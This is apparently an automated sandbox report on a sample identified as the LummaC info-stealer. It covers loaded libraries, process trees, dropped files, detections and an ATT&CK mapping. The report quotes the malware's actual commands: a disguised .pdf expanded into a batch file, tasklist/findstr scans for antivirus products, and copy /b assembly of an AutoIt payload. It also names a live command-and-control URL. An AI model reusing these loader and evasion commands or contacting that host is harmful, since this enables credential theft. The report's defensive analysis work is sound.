Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: #Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Static file information: File size 1483827 > 1048576

Source: #Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\119035\Cuba.com

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\119035\Cuba.com

Jump to dropped file

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com TID: 5920

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\119035	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\119035\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Increases.pdf Increases.pdf.bat & Increases.pdf.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\expand.exe expand Increases.pdf Increases.pdf.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 119035	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Leads.pdf	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Die" Protecting	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 119035\Cuba.com + Handhelds + Phases + Merger + Convenient + Pickup + Den + Agent + Intimate + Architect + Apparent + Relatively 119035\Cuba.com	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Updates.pdf + ..\Florence.pdf + ..\Pastor.pdf + ..\Exceptions.pdf + ..\Anthropology.pdf + ..\Oriented.pdf + ..\Completion.pdf + ..\Launched.pdf R	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\119035\Cuba.com Cuba.com R	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: Cuba.com, 0000000E.00000000.1250309204.0000000001073000.00000002.00000001.01000000.00000009.sdmp, Architect.10.dr, Cuba.com.2.dr

Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406805

Source: C:\Users\user\AppData\Local\Temp\119035\Cuba.com

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 Windows Management Instrumentation	1 Scripting	12 Process Injection	11 Masquerading	11 Input Capture	1 Virtualization/Sandbox Evasion	Remote Services	11 Input Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	LSASS Memory	3 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	12 Process Injection	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	5 System Information Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	46%	Virustotal		Browse
#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	32%	ReversingLabs
#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	100%	Avira	TR/Redcap.drlyr

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\119035\Cuba.com	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://techworld2025.top/api	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
techworld2025.top	172.67.189.153	true	true		unknown
RemCXcBAgdPicYq.RemCXcBAgdPicYq	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://techworld2025.top/api	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://www.autoitscript.com/autoit3/X	Cuba.com, 0000000E.00000000.1250404611.0000000001085000.00000002.00000001.01000000.00000009.sdmp, Architect.10.dr, Cuba.com.2.dr	false	high
http://nsis.sf.net/NSIS_ErrorError	#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	false	high
https://www.autoitscript.com/autoit3/	Cuba.com.2.dr, Relatively.10.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.189.153	techworld2025.top	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1631838
Start date and time:	2025-03-07 16:26:54 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe renamed because original name is a hash value
Original Sample Name:	.exe
Detection:	MAL
Classification:	mal96.troj.evad.winEXE@28/26@2/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 36 Number of non-executed functions: 38
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.199.214.10
Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, c.pki.goog
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:28:29	API Interceptor	1x Sleep call for process: Cuba.com modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
techworld2025.top	#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.89.159

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.89.159
	uPDwUy9ewY.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.80.1
	lightijak2.1.exe	Get hash	malicious	FormBook	Browse	104.21.45.166
	qUG1ZROxLJ.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.80.1
	OeM750ajqm.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.80.1
	Checkpoint_News.html	Get hash	malicious	Unknown	Browse	1.1.1.1
	EYv5BQ5NjI.exe	Get hash	malicious	Unknown	Browse	162.159.133.233
	UFOiZapHGS.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	jVE64QGXtK.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.16.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.189.153
	U0443.pdf.js	Get hash	malicious	RMSRemoteAdmin	Browse	172.67.189.153
	bdc2be5bddda548dec3c2d88464a698627ac9447aae621d8.ps1	Get hash	malicious	LummaC Stealer	Browse	172.67.189.153
	3vnPlay__(Harrison.edwards)__Now_AUD__autoresponse_}.svg	Get hash	malicious	HTMLPhisher	Browse	172.67.189.153
	MITRE Enterprise ATTACK v16.1.xlsx	Get hash	malicious	Mimikatz	Browse	172.67.189.153
	SecuriteInfo.com.Win32.CrypterX-gen.14771.3084.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.189.153
	05 BOIRON F 240700457 ORDEN 05 MAR 2025.xls	Get hash	malicious	Unknown	Browse	172.67.189.153
	xuy.bin.exe	Get hash	malicious	Xmrig	Browse	172.67.189.153
	Quote 09052022-008_1.xlsx	Get hash	malicious	Unknown	Browse	172.67.189.153
	bdc2be5bddda548dec3c2d88464a698627ac9447aae621d8.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.189.153

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\119035\Cuba.com	#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Get hash	malicious	LummaC Stealer	Browse
	00000123.exe	Get hash	malicious	Discord Token Stealer	Browse
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	9FB5#U007e1.EXE.exe	Get hash	malicious	LummaC Stealer	Browse
	wanscam software ocx setup download.exe	Get hash	malicious	LummaC Stealer	Browse
	wanscam software ocx setup download.exe	Get hash	malicious	Unknown	Browse
	#Ud835#Udc12#Ud835#Udc1e#Ud835#Udc2d#Ud835#Udc2e#Ud835#Udc29.exe	Get hash	malicious	LummaC Stealer	Browse
	#Ud835#Udde6#Ud835#Uddf2#Ud835#Ude01#Ud835#Ude02#Ud835#Uddfd.exe	Get hash	malicious	LummaC Stealer	Browse
	#Ud835#Udc12#Ud835#Udc1e#Ud835#Udc2d#Ud835#Udc2e#Ud835#Udc29.exe	Get hash	malicious	LummaC Stealer	Browse
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\119035\Cuba.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
